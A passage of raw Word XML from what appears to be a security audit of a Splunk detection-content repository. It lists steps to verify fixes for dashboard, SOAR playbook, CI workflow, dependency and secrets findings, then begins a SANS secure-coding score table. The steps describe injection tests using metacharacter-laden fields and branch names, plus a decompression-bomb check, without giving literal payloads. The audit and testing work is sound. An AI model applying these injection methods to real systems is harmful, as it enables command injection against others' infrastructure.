              <w:t>detect-secrets scan --all-files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 Confirming the dashboard fixes (APP-01, APP-02)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Apply the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> safe-quote filter to every token that is placed inside a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app_template/default/data/ui/views/escu_summary.xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dashboards/applocker.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, remove the literal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;prefix&gt;"&lt;/prefix&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;suffix&gt;"&lt;/suffix&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wrapper, and set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>submitOnDashboardLoad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to false on the AppLocker dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
        <w:tab/>
        <w:t>Rebuild and reinstall the app on the test Splunk instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
        <w:tab/>
        <w:t>Open each dashboard, choose a value from the dropdown, and inspect the executed search in the Job Inspector (the search string is shown under "Search job properties"). The token value must appear as a single double-quoted SPL string literal with any embedded quote escaped. If the value is still concatenated bare, the fix was not applied.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
        <w:tab/>
        <w:t>Confirm the AppLocker panels no longer run until Submit is pressed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.3 Confirming the SOAR fixes (PB1-01 to PB1-03, PB2-01 to PB2-04, PB2-10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
        <w:tab/>
        <w:t>In the SOAR lab, create a test container with artifacts whose CEF fields contain the shell, PowerShell and query metacharacters listed in each finding (quotes, semicolons, pipes, brackets, commas, parentheses). Use a hostname and file path that exist only in the lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Run the patched playbook in debug mode and open the action's "parameters" tab in the SOAR UI for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>execute program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>query device</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run admin command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
        <w:tab/>
        <w:t>Expected result after the fix: the parameter shows the value as one quoted argument (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shlex.quote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> output for bash, single-quoted literals for PowerShell, a rejected-input error for FQL, LDAP and SPL when the value fails the allow-list), and the destructive branch stops at a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prompt2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> approval addressed to a security role rather than running automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">For CF-04 (zip extraction), upload a 10 MiB zero-filled file compressed into a small zip to the vault and run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>zip_extract</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; the patched function must refuse the archive on the ratio check and leave no directory under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/opt/phantom/vault/tmp/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>5.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">For PB1-06, run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AWS_IAM_Account_Unlocking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> against a lab IAM user and confirm in CloudTrail that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CreateLoginProfile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> carried </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PasswordResetRequired=true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and that no fixed password string appears in the playbook JSON or in the container comments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>6.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">For PB1-08, feed a Talos result with threat level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Untrusted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and confirm the normalized score is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Malicious</w:t>
      </w:r>
      <w:r>
        <w:t>, not blank.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.4 Confirming the CI fixes (CI-01, CI-02, CI-04, DEP-02, DEP-05)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">In your private fork, apply the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>env:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> indirection shown in CI-01 to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>unit-testing.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>permissions: {contents: read}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, pin every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>uses:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to a commit SHA, and move </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws-actions/configure-aws-credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> below the dependency-install step in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>update_splunk_tas.yml</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
        <w:tab/>
        <w:t>From a second GitHub account, open a pull request from a branch whose name contains shell metacharacters that Git accepts (dollar-parenthesis and backticks are accepted; a bare double quote is not).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
        <w:tab/>
        <w:t>Approve the workflow run and read the "Print out information about PR target" step log. The branch name must be printed verbatim as text. If any command substitution took place the log will show its output instead of the literal name.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>semgrep --config p/github-actions .github/workflows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and confirm zero </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run-shell-injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and zero </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>github-actions-mutable-action-tag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> results.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.5 Confirming the dependency fixes (DEP-01, DEP-02, DEP-12)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Generate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip-compile --generate-hashes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from a one-line </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requirements.in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, install with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip install --require-hashes --no-deps -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and confirm pip refuses an edited hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Add the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ecosystems to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.github/dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and confirm Dependabot opens a grouped pull request within a week.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip-audit --strict --require-hashes -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in CI and confirm the job fails when a known-vulnerable pin is introduced on purpose, then passes once reverted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.6 Confirming the secrets fixes (SEC-*, CI-03, APP-11)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Remove the token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ta_update.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, replace fixture identifiers in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources/*.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with documented placeholders, and run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gitleaks detect --source . --no-git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detect-secrets scan --all-files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; the AWS access-key-id and generic-api-key rules must report zero hits in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Trigger </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>update_splunk_tas.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> manually with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>workflow_dispatch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and read the log: the Splunkbase token line must be absent or masked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. SANS Secure Coding Practices and Language Best-Practice Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This section scores the repository against the SANS/CERT Secure Coding Practices checklist and the language-specific best practices for Python, GitHub Actions and Splunk SPL. Each area is marked Met, Partially met or Not met, with the governing findings.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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950"/>
        <w:gridCol w:w="1194"/>
        <w:gridCol w:w="4496"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Practice area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Evidence and findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Input validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Not met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hostnames, file paths, PIDs, usernames, URLs, e-mail identifiers and search terms flow unvalidated into shell, PowerShell, SPL, FQL, LDAP, ServiceNow and REST-filter sinks (PB1-01 to PB1-05, PB2-01 to PB2-06, CF-01, CF-05 to CF-08, DET-02, DET-06). The Jira playbook validates and escapes correctly and is the reference pattern.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Output encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Not met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Command and query strings are built by concatenation without </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>shlex.quote</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, PowerShell single-quote escaping or the Splunk </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>|s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> filter; only one of 1,971 detections uses </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>|s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>. Dashboard tokens and SOAR notes are emitted unencoded (APP-01, APP-02, DET-05, PB1-10, CF-01).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authentication and password management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Not met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
